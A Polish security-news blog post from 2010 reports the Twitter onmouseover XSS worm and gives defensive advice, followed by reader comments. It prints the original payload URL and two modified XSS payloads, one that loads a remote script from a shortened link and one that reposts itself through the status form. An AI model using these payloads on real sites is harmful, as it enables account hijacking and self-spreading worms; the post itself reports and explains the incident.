15:59
21/9/2010

Jeśli chcecie zdobyć milion “followersów” musicie się śpieszyć ;-) Dzięki prostemu XSS-owi na Twitterze grasuje sobie właśnie robak. Ze względów bezpieczeństwa sugerujemy wylogowanie się z Twittera i korzystanie z “nieprzeglądarkowych” klientów do tego serwisu.

Robak na Twitterze

Bug został znaleziony przez użytkownika judofyr, który w demonstrującym atak “twitnięciu” umieścił instrukcję podmieniającą tło pod linkami na kolor czarny. Kolejne osoby dodały do tego hm… “exploita” (?) zdarzenie onmouseover wymuszające retwittowanie kodu i przekierowujące użytkowników na strony pornograficzne.

Twitter XSS

XSS w Twitterze

Kod “exploita”:
http://judofyr.net/@"style="background:#000;color:#000;/
Atak wykorzustuje błąd walidowania adresu URL w Twitterze. Cokolwiek, co znajduje się za “@” zostanie dołączone do URL w dodawanych na Twittera wpisach.

Po lekkich modyfikacjach, “payload” tego “exploita” może stać się groźniejszy:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ....
lub zacznie się sam rozprzestrzeniać:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()

Wyłączenie JavaScriptu podczas korzystania z Twittera, wylogowanie się z serwisu, skorzystanie z innych niż przeglądarka klientów jest obecnie całkiem dobrym pomysłem…

Aktualizacja 16:09
Błąd jest już załatany — kto się pobawił, to się pobawił. Przeszukajcie sobie Twittera pod kątem “onmouseover” aby poznać skalę robaka ;-)

Przeczytaj także:


Dowiedz się, jak zabezpieczyć swoje pieniądze, dane i tożsamość przed cyberprzestępcami. Wpadnij na nasz kultowy 3,5 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i prostych do wdrożenia porad, które skutecznie podniosą Twoje bezpieczeństwo.

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze. Prowadzimy go przystępnym językiem, przeplatając demonstracjami ataków na żywo -- dlatego zabierz ze sobą swoich rodziców! W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

4 komentarzy

Dodaj komentarz
  1. Mobilny twitter działa i pozwala na kasowanie postów – to tak jakby ktoś musiał ;D

  2. […] P.S. Wzięliśmy plik na tapetę i przeczesujemy go pod kątem podejrzanych instrukcji. Jeśli znajdziemy w nim coś niepokojącego, zaktualizujemy ten post. W międzyczasie zastanówcie się, czy nie warto wyłączyć obsługi JavaScript w przeglądarce (przemawia za tym także dzisiejszy atak na Twitterze). […]

  3. Ciekawi mnie jak ten “robak” grasował sobie po Twitterze i jak zwabiał ofiary.

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: